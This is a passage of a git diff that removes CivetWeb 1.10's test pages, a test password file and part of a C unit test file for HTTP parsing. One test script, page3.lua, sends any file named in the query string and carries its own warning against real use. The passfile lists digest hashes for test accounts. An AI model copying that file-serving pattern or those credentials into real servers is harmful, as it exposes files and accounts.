-  conn.write("<p>\r\n");

-  conn.write("<b>" + title + "</b><br>\r\n");

-  elms = Object.getOwnPropertyNames(obj)

-

-  for (var i = 0; i < elms.length; i++) {

-    conn.write(JSON.stringify(elms[i]) + ":<br>\r\n")

-    conn.write("Type: " + typeof(obj[elms[i]]) + "<br>\r\n")

-    conn.write(JSON.stringify(Object.getOwnPropertyDescriptor(obj, elms[i]))  + "<br>\r\n")

-    conn.write("<br>\r\n")

-  }

-  conn.write('<br></p>\r\n')

-}

-

-

-print_elements("conn", conn)

-print_elements("civetweb", civetweb)

-

-

-conn.write('</body></html>\r\n')

diff --git a/thirdparty/civetweb-1.10/test/page3.lp b/thirdparty/civetweb-1.10/test/page3.lp
deleted file mode 100644
index 8d18b74..0000000
--- a/thirdparty/civetweb-1.10/test/page3.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = string.gsub(mg.script_name, "page3.lp$", "page2.lp")
-  mg.write("Output of " .. script .. ":\n")
-?>
-</p><p>
-<?
-  mg.include(script)
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3.lua b/thirdparty/civetweb-1.10/test/page3.lua
deleted file mode 100644
index fec6899..0000000
--- a/thirdparty/civetweb-1.10/test/page3.lua
+++ /dev/null
@@ -1,34 +0,0 @@
--- This test checks if a query string has been given.

--- It sends the file identified by the query string.

--- Do not use it in a real server in this way!

-

-if not mg.request_info.query_string then

-    mg.write("HTTP/1.0 200 OK\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script test page 3</title></head>\r\n")

-    mg.write("<body>No query string!</body></html>\r\n")

-elseif mg.request_info.query_string:match("/") or mg.request_info.query_string:match("\\") then

-    mg.write("HTTP/1.0 403 Forbidden\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script test page 3</title></head>\r\n")

-    mg.write("<body>No access!</body></html>\r\n")

-else

-    file = mg.get_var(mg.request_info.query_string, "file");

-    if not file then

-        mg.write("HTTP/1.0 400 Bad Request\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html>\r\n<head><title>Civetweb Lua script test page 3</title></head>\r\n")

-        mg.write("<body>\r\nQuery string does not contain a 'file' variable.<br>\r\n")

-        mg.write("Try <a href=\"?file=page3.lua&somevar=something\">?file=page3.lua&somevar=something</a>\r\n")

-        mg.write("</body>\r\n</html>\r\n")

-    else

-        filename = mg.document_root .. "/" .. file

-        mg.send_file(filename)

-    end

-end

diff --git a/thirdparty/civetweb-1.10/test/page3.ssjs b/thirdparty/civetweb-1.10/test/page3.ssjs
deleted file mode 100644
index 71e55e3..0000000
--- a/thirdparty/civetweb-1.10/test/page3.ssjs
+++ /dev/null
@@ -1,61 +0,0 @@
-print = conn.write || print
-
-opts = [
-"cgi_pattern",
-"cgi_environment",
-"put_delete_auth_file",
-"cgi_interpreter",
-"protect_uri",
-"authentication_domain",
-"ssi_pattern",
-"throttle",
-"access_log_file",
-"enable_directory_listing",
-"error_log_file",
-"global_auth_file",
-"index_files",
-"enable_keep_alive",
-"access_control_list",
-"extra_mime_types",
-"listening_ports",
-"document_root",
-"ssl_certificate",
-"num_threads",
-"run_as_user",
-"url_rewrite_patterns",
-"hide_files_patterns",
-"request_timeout_ms",
-"websocket_timeout_ms",
-"decode_url",
-"lua_preload_file",
-"lua_script_pattern",
-"lua_server_page_pattern",
-"_experimental_duktape_script_pattern",
-"websocket_root",
-"lua_websocket_pattern",
-"access_control_allow_origin",
-"error_pages",
-"_unknown__option"
-]
-
-// send a header
-print('HTTP/1.0 200 OK\r\n');
-print('Content-Type: text/html\r\n');
-print('\r\n');
-
-print("<html><body>\n");
-print("<p>This example page is generated by the ");
-print('<a href="https://github.com/civetweb/civetweb">CivetWeb web server</a>');
-print(" with server side javascript.</p>\n");
-
-for (var i=0; i < opts.length; i++) {
-  var o = opts[i];
-  var n = civetweb.getoption(o);
-  if (typeof(n) == "string") {
-    print("<p>Option " + o + " = " + n + "</p>\n");
-  } else {
-    print("<p>Option " + o + " not known</p>\n");
-  }
-}
-
-print("</body></html>\n");
diff --git a/thirdparty/civetweb-1.10/test/page3a.lp b/thirdparty/civetweb-1.10/test/page3a.lp
deleted file mode 100644
index 1595aa5..0000000
--- a/thirdparty/civetweb-1.10/test/page3a.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "test/page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"abs\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "abs")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3r.lp b/thirdparty/civetweb-1.10/test/page3r.lp
deleted file mode 100644
index e849cfc..0000000
--- a/thirdparty/civetweb-1.10/test/page3r.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"rel\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "rel")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page3v.lp b/thirdparty/civetweb-1.10/test/page3v.lp
deleted file mode 100644
index 5f81126..0000000
--- a/thirdparty/civetweb-1.10/test/page3v.lp
+++ /dev/null
@@ -1,20 +0,0 @@
-HTTP/1.0 200 OK
-Content-Type: text/html
-
-<html><body>
-
-
-<p>This is a test page of mg.include in a Lua server page, served by the
-<a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-</p><p>
-<?
-  script = "page2.lp"
-  mg.write("Output of " .. script .. " (path type: \"virtual\"):\n")
-?>
-</p><p>
-<?
-  mg.include(script, "virtual")
-?>
-</p>
-
-</body></html>
diff --git a/thirdparty/civetweb-1.10/test/page4.lua b/thirdparty/civetweb-1.10/test/page4.lua
deleted file mode 100644
index e2b84d7..0000000
--- a/thirdparty/civetweb-1.10/test/page4.lua
+++ /dev/null
@@ -1,180 +0,0 @@
--- This test checks the Lua functions:

--- get_var, get_cookie, md5, url_encode

-

-now = os.time()

-cookie_name = "civetweb-test-page4"

-

-if mg.request_info.http_headers.Cookie then

-   cookie_value = tonumber(mg.get_cookie(mg.request_info.http_headers.Cookie, cookie_name))

-end

-

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-if not cookie_value then

-    mg.write("Set-Cookie: " .. cookie_name .. "=" .. tostring(now) .. "\r\n")

-end

-mg.write("\r\n")

-

-mg.write("<html>\r\n<head><title>Civetweb Lua script test page 4</title></head>\r\n<body>\r\n")

-mg.write("<p>Test of Civetweb Lua Functions:</p>\r\n");

-mg.write("<pre>\r\n");

-

--- get_var of query_string

-mg.write("get_var test (check query string):\r\n")

-if not mg.request_info.query_string then

-    mg.write("  No query string. You may try <a href='?a=a1&amp;junk&amp;b=b2&amp;cc=cNotSet&amp;d=a, b and d should be set&amp;z=z'>this example</a>.\r\n")

-else

-    for _,var in ipairs({'a','b','c','d'}) do

-       value = mg.get_var(mg.request_info.query_string, var);

-       if value then

-         mg.write("  Variable " .. var .. ": value " .. value .. "\r\n");

-       else

-         mg.write("  Variable " .. var .. " not set\r\n");

-       end

-    end

-end

-mg.write("\r\n")

-

--- md5

-mg.write("MD5 test:\r\n")

-test_string = "abcd\0efgh"

-mg.write("  String with embedded 0, length " .. string.len(test_string))

-test_md5 = mg.md5(test_string)

-mg.write(", MD5 " .. test_md5 .. "\r\n")

-if mg.md5("") == "d41d8cd98f00b204e9800998ecf8427e" then

-    mg.write("  MD5 of empty string OK\r\n")

-else

-    mg.write("  Error: MD5 of empty string NOT OK\r\n")

-end

-if mg.md5("The quick brown fox jumps over the lazy dog.") == "e4d909c290d0fb1ca068ffaddf22cbd0" then

-    mg.write("  MD5 of test string OK\r\n")

-else

-    mg.write("  Error: MD5 of test string NOT OK\r\n")

-end

-mg.write("\r\n")

-

--- get_cookie

-mg.write("Cookie test:\r\n")

-if not cookie_value then

-    mg.write("  Cookie not set yet. Please reload the page.\r\n")

-else

-    mg.write("  Cookie set to " .. cookie_value .. "\r\n")

-    mg.write("  You visited this page " .. os.difftime(now, cookie_value) .. " seconds before.\r\n")

-end

-mg.write("\r\n")

-

--- test 'require' of other Lua scripts

-mg.write("require test\r\n")

-script_path = mg.script_name:match("(.*)page%d*.lua")

-if type(script_path)=='string' then

-    package.path = script_path .. "?.lua;" .. package.path

-    mg.write("  Lua search path: " .. package.path .. "\r\n")

-    require "html_esc"

-    require "require_test"

-    if htmlEscape then

-      for i=0,15 do

-        mg.write("  ")

-        for j=0,15 do

-            mg.write(tostring(htmlEscape[16*i+j]))

-        end

-        mg.write("\r\n")

-      end

-    else

-      mg.write("  'require' test failed (htmlEscape)\r\n")

-    end

-    if HugeText then

-      mg.write("\r\n")

-      local ht = HugeText(os.date("%a %b. %d"))

-      for i=1,#ht do

-        mg.write("  " .. ht[i] .. "\r\n")

-      end

-    else

-      mg.write("  'require' test failed (HugeText)\r\n")

-    end

-else

-    mg.write("  name match failed\r\n")

-end

-mg.write("\r\n")

-

--- test get_response_code_text

-mg.write("HTTP helper methods test:\r\n")

-if (htmlEscape("<a b & c d>") == "&lt;a b &amp; c d&gt;") then

-    mg.write("  htmlEscape test OK\r\n")

-else

-    mg.write("  Error: htmlEscape test NOT OK\r\n")

-end

-if (mg.get_response_code_text(200) == "OK") then

-    mg.write("  get_response_code_text test OK\r\n")

-else

-    mg.write("  Error: get_response_code_text test NOT OK\r\n")

-end

-mg.write("\r\n")

-

--- url_encode

-mg.write("URL encode/decode test:\r\n")

-if mg.url_encode("") == "" then

-    mg.write("  url_encode of empty string OK\r\n")

-else

-    mg.write("  Error: url_encode of empty string NOT OK\r\n")

-end

-raw_string = [[ !"#$%&'()*+,-./0123456789:;<=>?@]]

-mg.write("  original string: " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.url_encode(raw_string):upper()

-ref_string = "%20!%22%23%24%25%26'()*%2B%2C-.%2F0123456789%3A%3B%3C%3D%3E%3F%40" -- from http://www.w3schools.com/tags/ref_urlencode.asp

-mg.write("  mg-url:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference url: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string)

-dec_ref_string = mg.url_decode(ref_string)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string, false)

-dec_ref_string = mg.url_decode(ref_string, false)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-dec_mg_string = mg.url_decode(mg_string, true)

-dec_ref_string = mg.url_decode(ref_string, true)

-mg.write("  decoded mg-url:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference url: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-

--- base64_encode

-mg.write("BASE64 encode/decode test:\r\n")

-raw_string = [[ !"#$%&'()*+,-./0123456789:;<=>?@]]

-mg.write("  original string:  " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.base64_encode(raw_string)

-ref_string = "ICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9A" -- from http://www.base64encode.org/

-mg.write("  mg-base64:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference base64: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.base64_decode(mg_string)

-dec_ref_string = mg.base64_decode(ref_string)

-mg.write("  decoded mg-base64:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference base64: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-raw_string = [[<?> -?-]]

-mg.write("  original string:  " .. htmlEscape(raw_string) .. "\r\n")

-mg_string = mg.base64_encode(raw_string)

-ref_string = "PD8+IC0/LQ==" -- from http://www.base64encode.org/

-mg.write("  mg-base64:        " .. htmlEscape(mg_string) .. "\r\n")

-mg.write("  reference base64: " .. htmlEscape(ref_string) .. "\r\n")

-dec_mg_string = mg.base64_decode(mg_string)

-dec_ref_string = mg.base64_decode(ref_string)

-mg.write("  decoded mg-base64:        " .. htmlEscape(dec_mg_string) .. "\r\n")

-mg.write("  decoded reference base64: " .. htmlEscape(dec_ref_string) .. "\r\n")

-mg.write("\r\n")

-

--- random

-mg.write("Random numbers:\r\n")

-for i=1,10 do mg.write(string.format("%18u\r\n", mg.random())) end

-mg.write("\r\n")

-

--- uuid

-if mg.uuid then

-mg.write("UUIDs:\r\n")

-for i=1,10 do mg.write(string.format("%40s\r\n", mg.uuid())) end

-mg.write("\r\n")

-end

-

--- end of page

-mg.write("</pre>\r\n</body>\r\n</html>\r\n")

diff --git a/thirdparty/civetweb-1.10/test/page5.lua b/thirdparty/civetweb-1.10/test/page5.lua
deleted file mode 100644
index dcf7f9f..0000000
--- a/thirdparty/civetweb-1.10/test/page5.lua
+++ /dev/null
@@ -1,8 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body><p>

-Hello world!

-</p>

-</body></html>

-]])

diff --git a/thirdparty/civetweb-1.10/test/page6.lua b/thirdparty/civetweb-1.10/test/page6.lua
deleted file mode 100644
index dc30439..0000000
--- a/thirdparty/civetweb-1.10/test/page6.lua
+++ /dev/null
@@ -1,16 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")
-mg.write("Content-Type: text/plain\r\n")
-mg.write("\r\n")
-mg.write(mg.request_info.request_method .. " " .. mg.request_info.request_uri .. "  HTTP/" .. mg.request_info.http_version .. "\r\n")
-for k,v in pairs(mg.request_info.http_headers) do
-  mg.write(k .. ": " .. v .. "\r\n")
-end
-mg.write("\r\n")
-
-repeat
-  local r = mg.read()
-  if (r) then
-    mg.write(r)
-  end
-until not r
-
diff --git a/thirdparty/civetweb-1.10/test/page_keep_alive.lua b/thirdparty/civetweb-1.10/test/page_keep_alive.lua
deleted file mode 100644
index d869ce4..0000000
--- a/thirdparty/civetweb-1.10/test/page_keep_alive.lua
+++ /dev/null
@@ -1,34 +0,0 @@
--- Set keep_alive. The return value specifies if this is possible at all.
-canKeepAlive = mg.keep_alive(true)
-
-if canKeepAlive then
-    -- Create the entire response in a string variable first. Content-Length will be set to the length of this string.
-    reply = [[
-        <html><body>
-        <p>This is a Lua script supporting html keep-alive with the 
-        <a href="https://github.com/civetweb/civetweb/">CivetWeb web server</a>.
-        </p>
-        <p>It works by setting the Content-Length header field properly.
-        </body></html>
-    ]]
-else
-    reply = "<html><body>Keep alive not possible!</body></html>"
-end
-
--- First send the http headers
-mg.write("HTTP/1.1 200 OK\r\n")
-mg.write("Content-Type: text/html\r\n")
-mg.write("Date: " .. os.date("!%a, %d %b %Y %H:%M:%S") .. " GMT\r\n")
-mg.write("Cache-Control: no-cache\r\n")
-
-if canKeepAlive then
-    mg.write("Content-Length: " .. tostring(string.len(reply)) .. "\r\n")
-    mg.write("Connection: keep-alive\r\n")
-else
-    mg.write("Connection: close\r\n")
-end
-mg.write("\r\n")
-
--- Finally send the content
-mg.write(reply)
-
diff --git a/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua b/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua
deleted file mode 100644
index 28ac7d1..0000000
--- a/thirdparty/civetweb-1.10/test/page_keep_alive_chunked.lua
+++ /dev/null
@@ -1,66 +0,0 @@
--- Set keep_alive. The return value specifies if this is possible at all.
-canKeepAlive = mg.keep_alive(true)
-now = os.date("!%a, %d %b %Y %H:%M:%S")
-
--- First send the http headers
-mg.write("HTTP/1.1 200 OK\r\n")
-mg.write("Content-Type: text/html\r\n")
-mg.write("Date: " .. now .. " GMT\r\n")
-mg.write("Cache-Control: no-cache\r\n")
-mg.write("Last-Modified: " .. now .. " GMT\r\n")
-if not canKeepAlive then
-    mg.write("Connection: close\r\n")
-    mg.write("\r\n")
-    mg.write("<html><body>Keep alive not possible!</body></html>")
-    return
-end
-if mg.request_info.http_version ~= "1.1" then
-    -- wget will use HTTP/1.0 and Connection: keep-alive, so chunked transfer is not possible
-    mg.write("Connection: close\r\n")
-    mg.write("\r\n")
-    mg.write("<html><body>Chunked transfer is only possible for HTTP/1.1 requests!</body></html>")
-    mg.keep_alive(false)
-    return
-end
-
--- use chunked encoding (http://www.jmarshall.com/easy/http/#http1.1c2)
-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")
---mg.write("Cache-Control: no-cache\r\n")
---mg.write("Cache-Control: no-store\r\n")
-mg.write("Connection: keep-alive\r\n")
-mg.write("Transfer-Encoding: chunked\r\n")
-mg.write("\r\n")
-
--- function to send a chunk
-function send(str)
-    local len = string.len(str)
-    mg.write(string.format("%x\r\n", len))
-    mg.write(str.."\r\n")
-end
-
--- send the chunks
-send("<html>")
-send("<head><title>Civetweb Lua script chunked transfer test page</title></head>")
-send("<body>\n")
-
-fileCnt = 0
-if lfs then
-    send("Files in " .. lfs.currentdir())
-    send('\n<table border="1">\n')
-    send('<tr><th>name</th><th>type</th><th>size</th></tr>\n')
-    for f in lfs.dir(".") do
-        local at = lfs.attributes(f);
-        if at then
-          send('<tr><td>' .. f .. '</td><td>' .. at.mode .. '</td><td>' .. at.size .. '</td></tr>\n')
-        end
-        fileCnt = fileCnt + 1
-    end
-    send("</table>\n")
-end
-
-send(fileCnt .. " entries (" .. now .. " GMT)\n")
-send("</body>")
-send("</html>")
-
--- end
-send("")
diff --git a/thirdparty/civetweb-1.10/test/page_status.lua b/thirdparty/civetweb-1.10/test/page_status.lua
deleted file mode 100644
index 3c9b0eb..0000000
--- a/thirdparty/civetweb-1.10/test/page_status.lua
+++ /dev/null
@@ -1,38 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-

--- MIME type: https://www.ietf.org/rfc/rfc4627.txt, chapter 6

-mg.write("Content-Type: application/json\r\n")

-

-mg.write("\r\n")

-

-num_threads = mg.get_option("num_threads")

-num_threads = tonumber(num_threads)

-

-

-function n(s) 

-  if ((type(s) == "string") and (#s > 0)) then 

-    return s 

-  else 

-    return "null" 

-  end

-end

-

-

-mg.write("{\r\n\"system\" :\r\n")

-

-mg.write(n(mg.get_info("system")))

-

-mg.write(",\r\n\"summary\" :\r\n")

-mg.write(n(mg.get_info("context")))

-mg.write(",\r\n\"common\" :\r\n")

-mg.write(n(mg.get_info("common")))

-mg.write(",\r\n\"connections\" :\r\n[\r\n")

-

-  mg.write(n(mg.get_info("connection", 1)))

-

-for i=2,num_threads do

-  mg.write(",\r\n")

-  mg.write(n(mg.get_info("connection", i)))

-end

-mg.write("]\r\n}\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/passfile b/thirdparty/civetweb-1.10/test/passfile
deleted file mode 100644
index 58c313a..0000000
--- a/thirdparty/civetweb-1.10/test/passfile
+++ /dev/null
@@ -1,3 +0,0 @@
-guest:mydomain.com:485264dcc977a1925370b89d516a1477
-Administrator:mydomain.com:e32daa3028eba04dc53e2d781e6fc983
-
diff --git a/thirdparty/civetweb-1.10/test/prime.ssjs b/thirdparty/civetweb-1.10/test/prime.ssjs
deleted file mode 100644
index 6dc3243..0000000
--- a/thirdparty/civetweb-1.10/test/prime.ssjs
+++ /dev/null
@@ -1,36 +0,0 @@
-// prime.js

-

-// Pure Ecmascript version of low level helper

-function primeCheckEcmascript(val, limit) {

-    for (var i = 2; i <= limit; i++) {

-        if ((val % i) == 0) { return false; }

-    }

-    return true;

-}

-

-// Select available helper at load time

-var primeCheckHelper = (this.primeCheckNative || primeCheckEcmascript);

-

-// Check 'val' for primality

-function primeCheck(val) {

-    if (val == 1 || val == 2) { return true; }

-    var limit = Math.ceil(Math.sqrt(val));

-    while (limit * limit < val) { limit += 1; }

-    return primeCheckHelper(val, limit);

-}

-

-function primeTest() {

-    var res = [];

-

-    print('Have native helper: ' + (primeCheckHelper !== primeCheckEcmascript) + '\n');

-    for (var i = 2; i <= 1000; i++) {

-        if (primeCheck(i)) { res.push(i); }

-    } 

-    print(res.join(' '));

-}

-

-print = this.send || conn.write

-

-print('HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n');

-

-primeTest();

diff --git a/thirdparty/civetweb-1.10/test/private.c b/thirdparty/civetweb-1.10/test/private.c
deleted file mode 100644
index 9b34f59..0000000
--- a/thirdparty/civetweb-1.10/test/private.c
+++ /dev/null
@@ -1,1018 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#define CIVETWEB_API static
-#endif
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-#undef MEMORY_DEBUGGING
-#endif
-
-#include "../src/civetweb.c"
-
-#include <stdlib.h>
-#include <time.h>
-
-#include "private.h"
-
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-static char tmp_parse_buffer[1024];
-
-static int
-test_parse_http_response(char *buf, int len, struct mg_response_info *ri)
-{
-	ck_assert_int_lt(len, (int)sizeof(tmp_parse_buffer));
-	memcpy(tmp_parse_buffer, buf, (size_t)len);
-	return parse_http_response(tmp_parse_buffer, len, ri);
-}
-
-static int
-test_parse_http_request(char *buf, int len, struct mg_request_info *ri)
-{
-	ck_assert_int_lt(len, (int)sizeof(tmp_parse_buffer));
-	memcpy(tmp_parse_buffer, buf, (size_t)len);
-	return parse_http_request(tmp_parse_buffer, len, ri);
-}
-
-
-START_TEST(test_parse_http_message)
-{
-	/* Adapted from unit_test.c */
-	/* Copyright (c) 2013-2015 the Civetweb developers */
-	/* Copyright (c) 2004-2013 Sergey Lyubka */
-	struct mg_request_info ri;
-	struct mg_response_info respi;
-	char empty[] = "";
-	char space[] = " \x00";
-	char req1[] = "GET / HTTP/1.1\r\n\r\n";
-	char req2[] = "BLAH / HTTP/1.1\r\n\r\n";
-	char req3[] = "GET / HTTP/1.1\nKey: Val\n\n";
-	char req4[] =
-	    "GET / HTTP/1.1\r\nA: foo bar\r\nB: bar\r\nskip\r\nbaz:\r\n\r\n";
-	char req5[] = "GET / HTTP/1.0\n\n";
-	char req6[] = "G";
-	char req7[] = " blah ";
-	char req8[] = "HTTP/1.0 404 Not Found\n\n";
-	char req9[] = "HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n";
-
-	char req10[] = "GET / HTTP/1.1\r\nA: foo bar\r\nB: bar\r\n\r\n";
-
-	char req11[] = "GET /\r\nError: X\r\n\r\n";
-
-	char req12[] =
-	    "POST /a/b/c.d?e=f&g HTTP/1.1\r\nKey1: val1\r\nKey2: val2\r\n\r\nBODY";
-
-
-	int lenreq1 = (int)strlen(req1);
-	int lenreq2 = (int)strlen(req2);
-	int lenreq3 = (int)strlen(req3);
-	int lenreq4 = (int)strlen(req4);
-	int lenreq5 = (int)strlen(req5);
-	int lenreq6 = (int)strlen(req6);
-	int lenreq7 = (int)strlen(req7);
-	int lenreq8 = (int)strlen(req8);
-	int lenreq9 = (int)strlen(req9);
-	int lenreq10 = (int)strlen(req10);
-	int lenreq11 = (int)strlen(req11);
-	int lenreq12 = (int)strlen(req12);
-	int lenhdr12 = lenreq12 - 4; /* length without body */
-
-	mark_point();
-
-	/* An empty string is neither a complete request nor a complete
-	 * response, so it must return 0 */
-	ck_assert_int_eq(0, get_http_header_len(empty, 0));
-	ck_assert_int_eq(0, test_parse_http_request(empty, 0, &ri));
-	ck_assert_int_eq(0, test_parse_http_response(empty, 0, &respi));
-
-	/* Same is true for a leading space */
-	ck_assert_int_eq(0, get_http_header_len(space, 1));
-	ck_assert_int_eq(0, test_parse_http_request(space, 1, &ri));
-	ck_assert_int_eq(0, test_parse_http_response(space, 1, &respi));
-
-	/* But a control character (like 0) makes it invalid */
-	ck_assert_int_eq(-1, get_http_header_len(space, 2));
-	ck_assert_int_eq(-1, test_parse_http_request(space, 2, &ri));
-	ck_assert_int_eq(-1, test_parse_http_response(space, 2, &respi));
-
-
-	/* req1 minus 1 byte at the end is incomplete */
-	ck_assert_int_eq(0, get_http_header_len(req1, lenreq1 - 1));
-
-
-	/* req1 minus 1 byte at the start is complete but invalid */
-	ck_assert_int_eq(lenreq1 - 1, get_http_header_len(req1 + 1, lenreq1 - 1));
-	ck_assert_int_eq(-1, test_parse_http_request(req1 + 1, lenreq1 - 1, &ri));
-
-
-	/* req1 is a valid request */
-	ck_assert_int_eq(lenreq1, get_http_header_len(req1, lenreq1));
-	ck_assert_int_eq(-1, test_parse_http_response(req1, lenreq1, &respi));
-	ck_assert_int_eq(lenreq1, test_parse_http_request(req1, lenreq1, &ri));
-	ck_assert_str_eq("1.1", ri.http_version);
-	ck_assert_int_eq(0, ri.num_headers);
-
-
-	/* req2 is a complete, but invalid request */
-	ck_assert_int_eq(lenreq2, get_http_header_len(req2, lenreq2));
-	ck_assert_int_eq(-1, test_parse_http_request(req2, lenreq2, &ri));
-
-
-	/* req3 is a complete and valid request */
-	ck_assert_int_eq(lenreq3, get_http_header_len(req3, lenreq3));
-	ck_assert_int_eq(lenreq3, test_parse_http_request(req3, lenreq3, &ri));
-	ck_assert_int_eq(-1, test_parse_http_response(req3, lenreq3, &respi));
-
-
-	/* Multiline header are obsolete, so return an error
-	 * (https://tools.ietf.org/html/rfc7230#section-3.2.4). */
-	ck_assert_int_eq(-1, test_parse_http_request(req4, lenreq4, &ri));
-
-
-	/* req5 is a complete and valid request (also somewhat malformed,
-	 * since it uses \n\n instead of \r\n\r\n) */
-	ck_assert_int_eq(lenreq5, get_http_header_len(req5, lenreq5));
-	ck_assert_int_eq(-1, test_parse_http_response(req5, lenreq5, &respi));
-	ck_assert_int_eq(lenreq5, test_parse_http_request(req5, lenreq5, &ri));
-	ck_assert_str_eq("GET", ri.request_method);
-	ck_assert_str_eq("1.0", ri.http_version);
-
-
-	/* req6 is incomplete */
-	ck_assert_int_eq(0, get_http_header_len(req6, lenreq6));
-	ck_assert_int_eq(0, test_parse_http_request(req6, lenreq6, &ri));
-
-
-	/* req7 is invalid, but not yet complete */
-	ck_assert_int_eq(0, get_http_header_len(req7, lenreq7));
-	ck_assert_int_eq(0, test_parse_http_request(req7, lenreq7, &ri));
-
-
-	/* req8 is a valid response */
-	ck_assert_int_eq(lenreq8, get_http_header_len(req8, lenreq8));
-	ck_assert_int_eq(-1, test_parse_http_request(req8, lenreq8, &ri));
-	ck_assert_int_eq(lenreq8, test_parse_http_response(req8, lenreq8, &respi));
-
-
-	/* req9 is a valid response */
-	ck_assert_int_eq(lenreq9, get_http_header_len(req9, lenreq9));
-	ck_assert_int_eq(-1, test_parse_http_request(req9, lenreq9, &ri));
-	ck_assert_int_eq(lenreq9, test_parse_http_response(req9, lenreq9, &respi));
-	ck_assert_int_eq(1, respi.num_headers);
-
-
-	/* req10 is a valid request */
-	ck_assert_int_eq(lenreq10, get_http_header_len(req10, lenreq10));
-	ck_assert_int_eq(lenreq10, test_parse_http_request(req10, lenreq10, &ri));
-	ck_assert_str_eq("1.1", ri.http_version);
-	ck_assert_int_eq(2, ri.num_headers);
-	ck_assert_str_eq("A", ri.http_headers[0].name);
-	ck_assert_str_eq("foo bar", ri.http_headers[0].value);
-	ck_assert_str_eq("B", ri.http_headers[1].name);
-	ck_assert_str_eq("bar", ri.http_headers[1].value);
-
-
-	/* req11 is a complete but valid request */
